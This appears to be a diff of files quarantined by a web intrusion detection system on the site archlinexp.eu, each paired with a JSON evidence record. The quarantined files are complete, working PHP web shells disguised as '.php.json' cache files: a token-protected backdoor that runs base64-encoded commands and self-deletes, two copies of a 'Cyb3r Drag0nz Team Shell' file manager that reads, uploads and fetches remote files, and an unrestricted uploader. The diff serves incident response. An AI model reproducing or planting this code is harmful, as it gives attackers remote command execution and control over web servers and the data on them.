||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cache/c_03e0fd55.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json
vendored
Normal file
10
var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json
vendored
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='e45f50da3800d36c';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5022",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cache/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json)",
|
||||
"original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783201890,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cache/c_7f0b46f9.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json
vendored
Normal file
320
var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json
vendored
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
15
var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5023",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cache/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353219,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cache/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json
vendored
Normal file
320
var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json
vendored
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
15
var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5025",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cache/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783346946,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cache/yhajxaav.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
101
var/www/hosting/archlinexp.eu/www/cbdjs.json
Normal file
101
var/www/hosting/archlinexp.eu/www/cbdjs.json
Normal file
@ -0,0 +1,101 @@
|
||||
<?php$target_dir = "uploads/";
|
||||
$target_file = $target_dir . basename($_FILES["file"]["name"]);
|
||||
$uploadOk = 1;
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) {
|
||||
// Cek ukuran (maks 10MB)
|
||||
if ($_FILES["file"]["size"] > 10000000) {
|
||||
echo "Maaf, file terlalu besar (maks 10MB).";
|
||||
$uploadOk = 0;
|
||||
}
|
||||
|
||||
if ($uploadOk == 1) {
|
||||
// Buat folder jika belum ada
|
||||
if (!is_dir($target_dir)) {
|
||||
mkdir($target_dir, 0755, true);
|
||||
}
|
||||
|
||||
// Pindahkan file (terima SEMUA jenis file)
|
||||
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
|
||||
echo "✅ File berhasil diupload: " . htmlspecialchars(basename($_FILES["file"]["name"]));
|
||||
echo "<br><br>";
|
||||
echo "<b>Path:</b> " . htmlspecialchars($target_file);
|
||||
echo "<br><br>";
|
||||
echo "<a href='" . htmlspecialchars($target_file) . "'>🔗 Akses File</a>";
|
||||
} else {
|
||||
echo "❌ Maaf, terjadi kesalahan saat upload.";
|
||||
}
|
||||
}
|
||||
} else {
|
||||
?>
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<title>File Uploader</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: Arial, sans-serif;
|
||||
background: #f5f5f5;
|
||||
padding: 20px;
|
||||
max-width: 600px;
|
||||
margin: 50px auto;
|
||||
}
|
||||
.box {
|
||||
background: white;
|
||||
